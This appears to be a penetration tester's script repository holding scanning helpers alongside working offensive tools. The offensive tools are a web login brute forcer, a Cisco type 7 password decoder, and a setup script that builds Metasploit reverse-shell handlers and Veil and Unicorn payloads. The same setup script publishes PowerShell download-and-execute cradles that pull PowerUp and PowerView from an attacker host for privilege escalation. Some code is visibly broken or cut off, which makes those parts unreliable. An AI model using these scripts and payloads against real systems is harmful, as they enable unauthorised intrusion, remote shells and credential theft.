├── diff.py ├── slash16.sh ├── type7.py ├── Username_Web_Scraper ├── k8s └── can-they │ ├── LICENSE │ └── can-they.sh ├── Web_Login_Brute ├── Roll For Initiative ├── README.txt ├── boost.py └── RFI.py ├── truffleparse.py ├── IPSift.py ├── setup.sh ├── pentest_prep.sh ├── kali_install.sh ├── kickoff.sh ├── multi_arachni.py └── PowerShellWMIEvents.ps1 /diff.py: -------------------------------------------------------------------------------- 1 | #Prints out unique lines between two files. 2 | file1 = open("file2.txt", "r") 3 | file2 = open("file1.txt", "r") 4 | list1 = file1.readlines() 5 | list2 = file2.readlines() 6 | print "Unique in file2" 7 | for i in list2: 8 | if i not in list1: 9 | print i 10 | 11 | print "Unique in file1" 12 | for i in list1: 13 | if i not in list2: 14 | print i 15 | -------------------------------------------------------------------------------- /slash16.sh: -------------------------------------------------------------------------------- 1 | #If a consistent gateway IP is used, this will help sift through a /16 2 | #so that you aren't feeding your scanner a bunch of non existent /24s.inc=1 3 | #Used '/root/slash16.sh |grep -B 1 "2 received"' to run and grep out valid subnets. 4 | 5 | for a in $(seq 1 254) 6 | do 7 | if [[ $inc -lt 6 ]] #Currently set to scan 5 systems at the same time. "Multiprocessing" if you will. 8 | then 9 | ping -c 2 x.x.$a.x & #gatway IP on each subnet. Sequencing through the 3rd octet 10 | ((inc++)) 11 | else 12 | wait 13 | inc=1 14 | fi 15 | done 16 | -------------------------------------------------------------------------------- /type7.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | encrypted_pass=sys.argv[1] 4 | keyword=["t","f","d",";","k","f","o","A",",",".","i","y","e","w","r","k","l","d","J","K","D"] 5 | n=2 6 | segmented_encrypted_pass=[encrypted_pass[i:i+n] for i in range(0, len(encrypted_pass), n)] 7 | salt_position=int(segmented_encrypted_pass[0])-1 8 | plaintext_pass=[] 9 | 10 | for idx, val in enumerate(segmented_encrypted_pass): 11 | if idx != 0: 12 | Current_salt=ord(keyword[salt_position]) 13 | decimal_value=int("0x"+val, 16) 14 | plaintext_pass.append(chr(Current_salt^decimal_value)) 15 | salt_position+=1 16 | 17 | print 'The plaintext password is: '+''.join(plaintext_pass) 18 | -------------------------------------------------------------------------------- /Username_Web_Scraper: -------------------------------------------------------------------------------- 1 | echo "*************************************************************" 2 | echo "Username Scraper by @sw@mp_f0x" 3 | echo "*************************************************************" 4 | 5 | echo "">page_id.txt 6 | 7 | for i in $(cat names.txt) 8 | do echo "Trying $i..." 9 | curl -s --data "name=$i&search_other_name=title" http://www.client.com/index.php |awk '/view\=/&&gsub(/.*view\=|'\''\>[A-Z].*/,"")'>> page_id.txt 10 | done 11 | 12 | for j in $(sort -u page_id.txt) 13 | do username=$(curl -s "http://www.client.com/index.php?view=$j"|awk '/Username\:/&&gsub(/.*Username:<\/td>|<\/td.*/,"")'|tee -a usernames.txt) 14 | echo "Username Found: $username" 15 | done 16 | -------------------------------------------------------------------------------- /k8s/can-they/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 sart-bf 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Web_Login_Brute: -------------------------------------------------------------------------------- 1 | echo "*************************************************************"|tee -a brute-forcer.log 2 | echo "Web Login Brute Forcing Tool by @sw@mp_f0x"|tee -a brute-forcer.log 3 | echo "*************************************************************"|tee -a brute-forcer.log 4 | 5 | #settings 6 | password=Password1 7 | count=0 8 | form_URL=https://www.client.com/displaylogin 9 | login_URL=https://www.client.com/login 10 | 11 | echo "Beginning brute force against $form_URL"|tee -a brute-forcer.log 12 | echo ""|tee -a brute-forcer.log 13 | for name in $(cat usernames.txt); 14 | do ((count++)) 15 | form_token=$(curl -s $form_URL|awk -F"\"" '/login.form.token/{print $2}') 16 | result=$(curl -s --data "pass=$password&user=$name&uid=$form_token" $submission_URL | grep "Error:") 17 | if [ -z "$result" ] 18 | then 19 | echo "[+]$count. Success! $name:$password"|tee -a brute-forcer.log 20 | else 21 | echo "[-]$count. $name Failed." |tee -a brute-forcer.log 22 | fi 23 | done 24 | 25 | echo "Finished."|tee -a brute-forcer.log 26 | echo ""|tee -a brute-forcer.log 27 | echo "=============================================================="|tee -a brute-forcer.log 28 | echo ""|tee -a brute-forcer.log 29 | echo "The following credentials were found:"|tee -a brute-forcer.log 30 | echo ""|tee -a brute-forcer.log 31 | grep 'Success' brute-forcer.log 32 | -------------------------------------------------------------------------------- /Roll For Initiative/README.txt: -------------------------------------------------------------------------------- 1 | Roll For Initiative is a tool for kicking of your security assessment. 2 | 3 | Setup: 4 | 1. Place both scripts in the same location 5 | 2. Run RFI.py 6 | 3. You will be presented with a menu to select from. Below is a description of the menu items 7 | 8 | Usage: 9 | When running, RFI is going to ask for a client name. This name will be used to create a client folder at '/root/Clients/[client name]'. Next, RFI is going to look for 'scope.txt' and 'excludes.txt' files in that client folder, with 'scope.txt' containing the ranges you want to scan and 'excludes.txt' containing anything that should not be scanned. The 'excludes.txt' file must exist, even if it is empty. Lastly, RFI will want you to confirm the log file to be use. Hit enter for the default. In this log file you will find timestamps for each scan done within RFI. 10 | 11 | Menu: 12 | 1. Kickoff scan - This is going to do a number of scans and parse some of those scans into useful files. 13 | a) Ping-sweep. Uses the 'scope.txt' and 'excludes.txt' to build a live host lists that is parsed into 'live-hosts.txt'. RFI will pause after the ping sweep so you can check your live host list. Hit enter when finished. 14 | b) Targeted port scans. The following ports are scanned for version information and create applicable Nmap, Gnmap, and XML files: 22, 23, 53, 389, 686, 2049, 5800,5900-5920, 5985, 10000. The following ports are scanned for version info and applicable NSE scripts are used: 445, 21, 25, 1433, 3306, 80. 15 | c) A list of non-printer hosts with telnet open is parsed into '/root/Clients/[client name]/Finals/TelnetList.txt'. 16 | d) A list of hosts with port 445 open is parsed into 445.txt. 17 | e) Hosts with port 25 open are scanned for SMTP enumeration and open relay. Results are exported to '/root/Clients/[client name]/Finals/'. 18 | 2. Rawr Scan - Nmap is used to scan each host for the following ports: 80,280,443,591,593,981,1311,2031,2480,3181,4444,4445,4567,4711,4712,5104,5280,7000,7001,7002,8000,8008,8011,8012,8013,8014,8042,8069,8080,8081,8243,8280,8281,8443,8531,8887,8888,9080,9443,11371,12443,16080,18091,18092. The resultant XML file is fed into Rawr. A folder start with 'log' will be dropped in the client folder with the Rawr results. 19 | 3. Service Scan - Scans for the top 1000 ports with Nmap. Exports Nmap, Gnmap, and XML. 20 | 4. Pentest Setup - Takes an IP address that it uses for LHOST. Creates TCP and HTTPS Veil and Unicorn payloads and drops them at '/root/' and '/var/www/html'. A Metasploit resource script named 'bounce' is placed in the root directory. When ran it will setup handlers for the TCP and HTTPS payloads. An html file is placed at '/var/www/html/cmd.html' that includes Powershell cmdlet download cradles with the supplied IP address. -------------------------------------------------------------------------------- /truffleparse.py: -------------------------------------------------------------------------------- 1 | import sqlite3 2 | import json 3 | import os 4 | 5 | ##### truffleparse.py ##### 6 | # Parses a folder of Trufflehog JSON files into a database for analysis 7 | 8 | # Set the path to your SQLite3 database file 9 | database_path = "truffle.sqlite3" 10 | # Set the directory containing Trufflehog JSON output files 11 | directory_path = "./" 12 | 13 | ########################### 14 | 15 | ### Reference Queries ### 16 | # SELECT DISTINCT detectorname FROM truffle; 17 | # SELECT DISTINCT raw FROM truffle ORDER BY raw ASC; 18 | # SELECT raw FROM truffle where raw like '%test.org%'; 19 | # SELECT DISTINCT raw,repo,file FROM truffle WHERE detectorname = 'AWS'; 20 | # SELECT raw, GROUP_CONCAT(repo) as repos FROM truffle GROUP BY raw; 21 | 22 | 23 | 24 | 25 | # Connect to the SQLite3 database 26 | conn = sqlite3.connect(database_path) 27 | c = conn.cursor() 28 | 29 | # Create the table to hold the Trufflehog results 30 | c.execute('''CREATE TABLE IF NOT EXISTS truffle 31 | ( 32 | repo TEXT, 33 | branch TEXT, 34 | file TEXT, 35 | line int, 36 | raw TEXT, 37 | detectorname TEXT, 38 | extradata TEXT 39 | ) 40 | ''') 41 | 42 | for filename in os.listdir(directory_path): 43 | if not filename.endswith(".json"): 44 | continue 45 | file_path = os.path.join(directory_path, filename) 46 | if os.path.isfile(file_path): 47 | # Do something with the file 48 | print(f"Found file: {file_path}") 49 | # Load the Trufflehog JSON output file 50 | with open(file_path, "r") as f: 51 | for finding in f.readlines(): 52 | print(finding) 53 | result = json.loads(finding) 54 | 55 | # Insert the Trufflehog results into the database 56 | repo = result["SourceMetadata"]["Data"]["Git"].get("repository") 57 | branch = result["SourceMetadata"]["Data"]["Git"].get("commit") 58 | file = result["SourceMetadata"]["Data"]["Git"].get("file") 59 | line = result["SourceMetadata"]["Data"]["Git"].get("line") 60 | raw = result.get("Raw") 61 | detectorname = result.get("DetectorName") 62 | extradata = str(result.get("ExtraData")) 63 | c.execute("INSERT INTO truffle (repo, branch, file, line, raw, detectorname, extradata) VALUES (?, ?, ?, ?, ?, ?, ?)", (repo, branch, file, line, raw, detectorname, extradata)) 64 | 65 | # Commit the changes and close the database connection 66 | conn.commit() 67 | else: 68 | # Handle directories or other non-file objects 69 | print(f"Found directory: {file_path}") 70 | 71 | 72 | conn.close() 73 | 74 | print("Trufflehog results ingested into the database successfully.") -------------------------------------------------------------------------------- /IPSift.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Created by @sw4mp_f0x 3 | # https://github.com/Sw4mpf0x/ 4 | # 5 | # Parse a list of line delimited IP addresses or gnmap file 6 | # for false positive /24 subnets based on the number of live hosts found 7 | # For example, the following will output all addresses in /24 subnets 8 | # where less that 250 hosts were found: 9 | # 10 | # python IPSift.py -g scan.gnmap -o output.txt -c 250 11 | # 12 | # The assumption here is that /24 ranges with more than 250 hosts showing as live 13 | # are false positives. 14 | # 15 | # 16 | # 17 | 18 | import re 19 | from os.path import isfile 20 | from optparse import OptionParser 21 | 22 | def gnmap_parse(path): 23 | if isfile(path): 24 | addresses = [] 25 | print "Gnmap file found, parsing..." 26 | with open(path) as file: 27 | for line in file: 28 | if "Up" in line: 29 | addresses.append('%s\n' % (line.split()[1])) 30 | return addresses 31 | else: 32 | parser.error("The gnmap file does not exists at the provided path") 33 | 34 | def txt_parse(path): 35 | if isfile(path): 36 | addresses = [] 37 | print "Txt file found, parsing..." 38 | with open(path) as file: 39 | for address in file: 40 | addresses.append(address) 41 | return addresses 42 | else: 43 | parser.error("The txt file does not exists at the provided path") 44 | 45 | def create_output_file(path, validaddresses, count): 46 | final_address_count = 0 47 | finaloutput = open(path, "w") 48 | for address_range in validaddresses: 49 | for address in address_range: 50 | finaloutput.write(address) 51 | final_address_count += 1 52 | finaloutput.close() 53 | print "" 54 | print "Valid ranges and addresses found to have less than " + count + " live hosts:" 55 | print "Valid ranges: " + str(len(validaddresses)) 56 | print "Valid addresses: " + str(final_address_count) 57 | print "Output file " + path + " created" 58 | print "" 59 | 60 | def main(): 61 | # Argument parsing 62 | usage = "usage: %prog --gnmap gnmap_file_path --output output_file_path" 63 | global parser 64 | parser = OptionParser(usage=usage) 65 | parser.add_option('-g', '--gnmap', action="store", help='GNmap file to parse', dest='gnmap_path') 66 | parser.add_option('-o', '--output', action="store", help='Output file name', dest='output_path') 67 | parser.add_option('-f', '--falsepos', action="store", help='False Positive Output file name', dest='false_output_path') 68 | parser.add_option('-t', '--txt', action="store", help="Txt file to parse", dest='txt_path') 69 | parser.add_option('-c', '--count', action="store", help="Marked /24 as false positive if number of hosts in /24 is >= this number", dest='count', default='255') 70 | 71 | (options, args) = parser.parse_args() 72 | 73 | # Checking for required arguments 74 | if not options.gnmap_path and not options.txt_path or not options.output_path: 75 | parser.error("A file to parse (gnmap or txt) and output file name must be specified") 76 | 77 | if options.gnmap_path: 78 | addresses = gnmap_parse(options.gnmap_path) 79 | elif options.txt_path: 80 | addresses = txt_parse(options.txt_path) 81 | 82 | addresses.sort(key=lambda ip: map(int, ip.split('.'))) 83 | print str(len(addresses)) + " addresses found" 84 | print "Processing addresses..." 85 | validaddresses = [] 86 | falsepositives = [] 87 | validrange = [] 88 | workingaddress = "" 89 | for address in addresses: 90 | if not workingaddress: 91 | workingaddresslist = address.split(".") 92 | workingaddress = ".".join(workingaddresslist[0:3]) 93 | validrange = [address] 94 | else: 95 | if re.match(workingaddress+"\.[0-9]+", address) is not None: 96 | validrange.append(address) 97 | else: 98 | if len(validrange) < int(options.count): 99 | print "Valid address range " + workingaddress + ".0/24 found" 100 | validaddresses.append(validrange) 101 | else: 102 | falsepositives.append([workingaddress + ".0/24]) 103 | workingaddresslist = address.split(".") 104 | workingaddress = ".".join(workingaddresslist[0:3]) 105 | validrange = [address] 106 | 107 | create_output_file(options.output_path, validaddresses, options.count) 108 | if options.false_output_path: 109 | create_output_file(options.false_output_path, falsepositives, options.count) 110 | 111 | if __name__ == "__main__": 112 | main() 113 | -------------------------------------------------------------------------------- /setup.sh: -------------------------------------------------------------------------------- 1 | apt-get update 2 | #cwd=$(pwd) 3 | touch /var/www/ghostdriver.log 4 | chmod 755 /var/www/ghostdriver.log 5 | chown www-data /var/www/ghostdriver.log 6 | 7 | #Setup Postgresql 8 | service postgresql start 9 | su postgres << 'EOF' 10 | createdb BloodHound_db 11 | psql -c "CREATE USER bloodhound WITH PASSWORD 'bloodhound' CREATEDB;" 12 | psql -c 'GRANT ALL PRIVILEGES ON DATABASE "BloodHound_db" TO bloodhound;' 13 | EOF 14 | 15 | mv BloodHound/ /opt/ 16 | #Install PhantomJS 17 | apt-get -y install python-requests python-m2crypto build-essential chrpath libssl-dev libxft-dev libfreetype6 libfreetype6-dev libfontconfig1 libfontconfig1-dev 18 | 19 | 20 | cd ~ 21 | MACHINE_TYPE=`uname -m` 22 | if [ ${MACHINE_TYPE} == 'x86_64' ]; then 23 | PHANTOM_JS="phantomjs-1.9.8-linux-x86_64" 24 | export PHANTOM_JS="phantomjs-1.9.8-linux-x86_64" 25 | else 26 | PHANTOM_JS="phantomjs-1.9.8-linux-i686" 27 | export PHANTOM_JS="phantomjs-1.9.8-linux-i686" 28 | fi 29 | 30 | wget https://bitbucket.org/ariya/phantomjs/downloads/$PHANTOM_JS.tar.bz2 31 | tar xvjf $PHANTOM_JS.tar.bz2 32 | 33 | mv $PHANTOM_JS /usr/local/share 34 | ln -sf /usr/local/share/$PHANTOM_JS/bin/phantomjs /usr/local/bin 35 | rm $PHANTOM_JS.tar.bz2 36 | 37 | #Make BloodHound Directory 38 | #start postgresql service at boot 39 | #http://thecodeship.com/deployment/deploy-django-apache-virtualenv-and-mod_wsgi/ 40 | #https://www.digitalocean.com/community/tutorials/how-to-serve-django-applications-with-apache-and-mod_wsgi-on-ubuntu-14-04 41 | #Install Python Virtual Environment 42 | apt-get -y install python-pip python-dev build-essential libpq-dev swig 43 | pip install --upgrade pip 44 | pip install Django 45 | pip install virtualenvwrapper 46 | pip install selenium 47 | echo "export WORKON_HOME=$HOME/.virtualenvs" >> ~/.bash_profile 48 | echo "source /usr/local/bin/virtualenvwrapper.sh" >> ~/.bash_profile 49 | source ~/.bash_profile 50 | cd /opt/BloodHound 51 | mkvirtualenv BloodHound --no-site-packages 52 | workon BloodHound 53 | pip install psycopg2 54 | pip install M2Crypto 55 | #Install Django 56 | pip install selenium 57 | pip install Django 58 | pip install Pillow==2.6.1 requests 59 | ./manage.py migrate 60 | ./manage.py makemigrations 61 | ./manage.py migrate 62 | chmod 777 /opt/BloodHound/Web_Scout/static/Web_Scout/ 63 | #Setup Python Virtual Environment 64 | #echo "export WORKON_HOME=$HOME/.virtualenvs" >> ~/.bash_profile 65 | #echo "source /usr/local/bin/virtualenvwrapper.sh" >> ~/.bash_profile 66 | #source ~/.bash_profile 67 | #cd /opt/BloodHound 68 | #mkvirtualenv BloodHound --no-site-packages 69 | #pip freeze > requirements.txt 70 | #workon BloodHound 71 | #for i in $(cat requirements.txt);do pip install $i;done 72 | #pip install psycopg2 73 | 74 | deactivate 75 | #rm requirements.txt 76 | 77 | 78 | 79 | #Setup Apache 80 | apt-get -y install apache2 libapache2-mod-wsgi 81 | 82 | echo "" >> /etc/apache2/sites-available/000-default.conf 83 | echo "" >> /etc/apache2/sites-available/000-default.conf 84 | echo " Alias /static /opt/BloodHound/Web_Scout/static/" >> /etc/apache2/sites-available/000-default.conf 85 | echo " " >> /etc/apache2/sites-available/000-default.conf 86 | echo " Require all granted" >> /etc/apache2/sites-available/000-default.conf 87 | echo " " >> /etc/apache2/sites-available/000-default.conf 88 | echo "" >> /etc/apache2/sites-available/000-default.conf 89 | echo " " >> /etc/apache2/sites-available/000-default.conf 90 | echo " " >> /etc/apache2/sites-available/000-default.conf 91 | echo " Require all granted" >> /etc/apache2/sites-available/000-default.conf 92 | echo " " >> /etc/apache2/sites-available/000-default.conf 93 | echo " " >> /etc/apache2/sites-available/000-default.conf 94 | echo " WSGIDaemonProcess BloodHound python-path=/opt/BloodHound:/root/.virtualenvs/BloodHound/lib/python2.7/site-packages" >> /etc/apache2/sites-available/000-default.conf 95 | echo " WSGIProcessGroup BloodHound" >> /etc/apache2/sites-available/000-default.conf 96 | echo " WSGIScriptAlias / /opt/BloodHound/BloodHound/wsgi.py" >> /etc/apache2/sites-available/000-default.conf 97 | echo "" >> /etc/apache2/sites-available/000-default.conf 98 | echo "" >> /etc/apache2/sites-available/000-default.conf 99 | echo "listen 8000" >> /etc/apache2/ports.conf 100 | service apache2 restart -------------------------------------------------------------------------------- /pentest_prep.sh: -------------------------------------------------------------------------------- 1 | #/bin/bash 2 | #Usage 3 | display_usage(){ 4 | clear 5 | echo "============================================================" 6 | echo "This script requires a LHOST IP address." 7 | echo "" 8 | echo "Usage: $0 10.10.10.10" 9 | echo "============================================================" 10 | echo "" 11 | } 12 | 13 | if [ $# -le 0 ] 14 | then 15 | display_usage 16 | exit 0 17 | fi 18 | 19 | #MSF resource file 20 | 21 | echo "use exploit/multi/handler" > /bounce 22 | echo "jobs -K" >> /bounce 23 | echo "set payload windows/meterpreter/reverse_tcp" >> /bounce 24 | echo "set exitonsession false" >> /bounce 25 | echo "set lport 53" >> /bounce 26 | echo "set enablestageencoding true" >> /bounce 27 | echo "set autorunscript migrate -f" >> /bounce 28 | echo "set LHOST $1" >> /bounce 29 | echo "exploit -j -z" >> /bounce 30 | 31 | echo "set payload windows/meterpreter/reverse_https" >> /bounce 32 | echo "set lport 443" >> /bounce 33 | echo "exploit -j -z" >> /bounce 34 | 35 | #Setup /var/www/cmd.html page 36 | 37 | echo "Invoke-AllChecks

" > /var/www/cmd.html 38 | echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/PowerUp.ps1'); Invoke-Allchecks\"" >> /var/www/cmd.html 39 | echo "

" >> /var/www/cmd.html 40 | echo "Write-UserAddServiceBinary

" >> /var/www/cmd.html 41 | echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/PowerUp.ps1'); Write-UserAddServiceBinary -ServiceName SQLRODBC\"" >> /var/www/cmd.html 42 | echo "

" >> /var/www/cmd.html 43 | echo "Invoke-ServiceUserAdd

" >> /var/www/cmd.html 44 | echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/PowerUp.ps1'); Invoke-ServiceUserAdd -ServiceName spooler\"" >> /var/www/cmd.html 45 | echo "

" >> /var/www/cmd.html 46 | echo "Invoke-FindLocalAdminAccess

" >> /var/www/cmd.html 47 | echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/powerview.ps1'); Invoke-FindLocalAdminAccess\"" >> /var/www/cmd.html 48 | echo "

" >> /var/www/cmd.html 49 | echo "Invoke-userhunter

" >> /var/www/cmd.html 50 | echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/powerview.ps1'); Invoke-userhunter\"" >> /var/www/cmd.html 51 | echo "

" >> /var/www/cmd.html 52 | echo "Invoke-ShareFinder

" >> /var/www/cmd.html 53 | echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/powerview.ps1'); Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii found_shares.txt\"" >> /var/www/cmd.html 54 | 55 | #Setup Veil payloads 56 | rm /root/HTTPS_443.exe 57 | rm /root/TCP_53.exe 58 | rm /root/power443.txt 59 | rm /root/power53.txt 60 | rm /var/www/HTTPS_443.exe 61 | rm /var/www/TCP_53.exe 62 | rm /var/www/power443.txt 63 | rm /var/www/power53.txt 64 | 65 | rm /usr/share/veil-evasion/compiled/HTTPS_443.exe 66 | rm /usr/share/veil-evasion/handlers/HTTPS_443_handler.rc 67 | rm /usr/share/veil-evasion/source/HTTPS_443.rb 68 | /root/tools/Veil-Evasion/Veil-Evasion.py -p ruby/meterpreter/rev_https -c LPORT=443 LHOST=$1 -o HTTPS_443 69 | cp /usr/share/veil-evasion/compiled/HTTPS_443.exe /root/HTTPS_443.exe 70 | cp /usr/share/veil-evasion/compiled/HTTPS_443.exe /var/www/HTTPS_443.exe 71 | 72 | rm /usr/share/veil-evasion/compiled/TCP_53.exe 73 | rm /usr/share/veil-evasion/handlers/TCP_53_handler.rc 74 | rm /usr/share/veil-evasion/source/TCP_53.rb 75 | /root/tools/Veil-Evasion/Veil-Evasion.py -p ruby/meterpreter/rev_tcp -c LPORT=53 LHOST=$1 -o TCP_53 76 | cp /usr/share/veil-evasion/compiled/TCP_53.exe /root/TCP_53.exe 77 | cp /usr/share/veil-evasion/compiled/TCP_53.exe /var/www/TCP_53.exe 78 | 79 | #Setup Unicorn payload 80 | python /root/tools/unicorn/unicorn.py windows/meterpreter/reverse_https $1 443 81 | cp /root/tools/powershell_attack.txt /root/power443.txt 82 | cp /root/tools/powershell_attack.txt /var/www/power443.txt 83 | echo "

" >> /var/www/cmd.html 84 | echo "Powershell HTTPS Payload

" >> /var/www/cmd.html 85 | cat /root/power443.txt >> /var/www/cmd.html 86 | 87 | python /root/tools/unicorn/unicorn.py windows/meterpreter/reverse_tcp $1 53 88 | cp /root/tools/powershell_attack.txt /root/power53.txt 89 | cp /root/tools/powershell_attack.txt /var/www/power53.txt 90 | echo "

" >> /var/www/cmd.html 91 | echo "Powershell TCP Payload

" >> /var/www/cmd.html 92 | cat /root/power53.txt >> /var/www/cmd.html 93 | -------------------------------------------------------------------------------- /kali_install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y 3 | 4 | rm /var/www/index.html 5 | mkdir /root/tools 6 | mkdir /var/www/rawr 7 | 8 | #basic installs 9 | apt-get install rdate 10 | apt-get install python-setuptools 11 | easy_install pip 12 | pip install selenium 13 | apt-get install unrar unace rar unrar p7zip zip unzip p7zip-full p7zip-rar file-roller -y 14 | 15 | #Big gitlist 16 | # 17 | #mkdir /opt/gitlist/ 18 | #cd /opt/gitlist 19 | #git clone https://github.com/macubergeek/gitlist.git 20 | #cd gitlist 21 | #chmod +x gitlist.sh 22 | #./gitlist.sh 23 | 24 | #msfconsole.rc 25 | # 26 | echo "spool /mylog.log" >> /msfconsole.rc 27 | echo "set consolelogging true" >> /msfconsole.rc 28 | echo "set loglevel 5" >> /msfconsole.rc 29 | echo "set sessionlogging true" >> /msfconsole.rc 30 | echo "set timestampoutput true" >> /msfconsole.rc 31 | echo 'setg prompt "%cya%T%grn S:%S%blu J:%J "' >> /msfconsole.rc 32 | 33 | #sipvicious 34 | 35 | cd /root/tools 36 | git clone https://github.com/sandrogauci/sipvicious.git 37 | 38 | #Empire 39 | 40 | cd /root/tools 41 | git clone https://github.com/PowerShellEmpire/Empire.git 42 | #run setup manually. 43 | 44 | #Snarf 45 | 46 | cd /root/tools 47 | git clone https://github.com/purpleteam/snarf.git 48 | 49 | #Veil-Evasion setup 50 | # 51 | 52 | pip install symmetricjsonrpc #needed for Kali 2.0 53 | cd /root/tools 54 | git clone https://github.com/Veil-Framework/Veil-Evasion.git 55 | cd /root/tools/Veil-Evasion/setup 56 | ./setup.sh 57 | cd /root/tools/Veil-Evasion/Veil-Catapult 58 | ./setup.sh 59 | 60 | #Responder Setup 61 | rm -r /usr/share/responder 62 | rm /usr/bin/responder 63 | cd /root/tools 64 | git clone https://github.com/SpiderLabs/Responder.git 65 | cd Responder 66 | cp -r * /usr/bin 67 | 68 | #Impacket Setup 69 | cd /root/tools 70 | git clone https://github.com/CoreSecurity/impacket.git 71 | cd impacket 72 | python setup.py install 73 | cp /root/tools/impacket/examples/smbrelayx.py /usr/bin 74 | chmod 755 /usr/bin/smbrelayx.py 75 | cp /root/tools/impacket/examples/goldenPac.py /usr/bin 76 | chmod 755 /usr/bin/goldenPac.py 77 | 78 | #CG's gold_digger script {http://carnal0wnage.attackresearch.com/2015/02/my-golddigger-script.html} 79 | # 80 | mkdir -p /opt/carnal0wnage 81 | cd /opt/carnal0wnage 82 | git clone https://github.com/carnal0wnage/Metasploit-Code.git 83 | cp /opt/carnal0wnage/Metasploit-Code/modules/post/windows/gather/gold_digger.rb /usr/share/metasploit-framework/modules/post/windows/gather 84 | 85 | #Shell_Shocker Setup 86 | cd /root/tools 87 | git clone https://github.com/mubix/shellshocker-pocs.git 88 | 89 | #RAWR Setup 90 | cd /root/tools 91 | git clone https://bitbucket.org/al14s/rawr.git 92 | cd /root/tools/rawr 93 | ./install.sh 94 | 95 | #PowerSploit Setup 96 | cd /root/tools 97 | git clone https://github.com/mattifestation/PowerSploit.git 98 | 99 | #PowerTools Setup 100 | cd /root/tools 101 | git clone https://github.com/Veil-Framework/PowerTools.git 102 | cp /root/tools/PowerTools/PowerUp/PowerUp.ps1 /var/www 103 | cp /root/tools/PowerTools/PowerView/powerview.ps1 /var/www 104 | 105 | #Pykek Setup 106 | cd /opt 107 | git clone https://github.com/bidord/pykek.git 108 | 109 | #payload autogeneration 110 | # 111 | cd /root/tools 112 | git clone https://github.com/trustedsec/unicorn.git 113 | 114 | cd ~/Desktop 115 | wget http://www.rarlab.com/rar/wrar520.exe 116 | wine wrar520.exe 117 | rm wrar520.exe 118 | 119 | #foofus OWA enum scripts 120 | # 121 | mkdir -p /opt/foofus 122 | cd /opt/foofus 123 | wget http://www.foofus.net/jmk/tools/owa/OWALogonBrute.pl 124 | wget http://www.foofus.net/jmk/tools/owa/OWA55EnumUsersURL.pl 125 | wget http://www.foofus.net/jmk/tools/owa/OWALightFindUsers.pl 126 | wget http://www.foofus.net/jmk/tools/owa/OWAFindUsers.pl 127 | wget http://www.foofus.net/jmk/tools/owa/OWAFindUsersOld.pl 128 | 129 | #Praeda install 130 | # 131 | cd /root/tools 132 | git clone https://github.com/percx/Praeda.git 133 | git clone https://github.com/MooseDojo/praedasploit.git 134 | cd praedasploit 135 | mkdir -p /usr/share/metasploit-framework/modules/auxiliary/praedasploit 136 | cp * /usr/share/metasploit-framework/modules/auxiliary/praedasploit 137 | cpan -i LWP::Simple LWP::UserAgent HTML::TagParser URI::Fetch HTTP::Cookies IO::Socket HTML::TableExtract Getopt::Std Net::SSL Net::SNMP NetAddr::IP 138 | 139 | #setup sambe 140 | mkdir /srv/kali 141 | chmod 777 /srv/kali 142 | echo "[kali]" >> /etc/samba/smb.conf 143 | echo " comment = Kali share" >> /etc/samba/smb.conf 144 | echo " path = /srv/kali" >> /etc/samba/smb.conf 145 | echo " browseable = yes" >> /etc/samba/smb.conf 146 | echo " public = yes" >> /etc/samba/smb.conf 147 | echo " writable = yes" >> /etc/samba/smb.conf 148 | echo " guest ok = yes" >> /etc/samba/smb.conf 149 | 150 | msfupdate 151 | 152 | apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y 153 | -------------------------------------------------------------------------------- /kickoff.sh: -------------------------------------------------------------------------------- 1 | #/bin/bash 2 | #Usage 3 | display_usage(){ 4 | clear 5 | echo "============================================================" 6 | echo "This script requires a 'working directory' to dump files to." 7 | echo "" 8 | echo "Usage: $0 /working/directory/" 9 | echo "============================================================" 10 | } 11 | 12 | if [ $# -le 0 ] 13 | then 14 | display_usage 15 | exit 0 16 | fi 17 | 18 | clear 19 | echo "" > kickofflog.log 20 | echo "" > report.txt 21 | #Define logit Function. Logs whatever it is fed to 22 | logit(){ 23 | echo "$(date +'%Y-%m-%d-%T') $1" >> $1kickofflog.log 24 | } 25 | report(){ 26 | echo $1 >> $1report.txt 27 | } 28 | 29 | #Discovery Scan 30 | 31 | echo -e "====================================" 32 | echo -e "Beginning Discovery Scan" 33 | echo -e "====================================" 34 | 35 | report "Beginning Discovery Scan..." 36 | logit "Start Discovery Scan" 37 | 38 | nmap -sn -v10 -T4 -n --open -iL $1scope.txt --excludefile $1excludes.txt -oG $1ping-sweep —-stats-every 1m 39 | 40 | report "Discovery scan has finished" 41 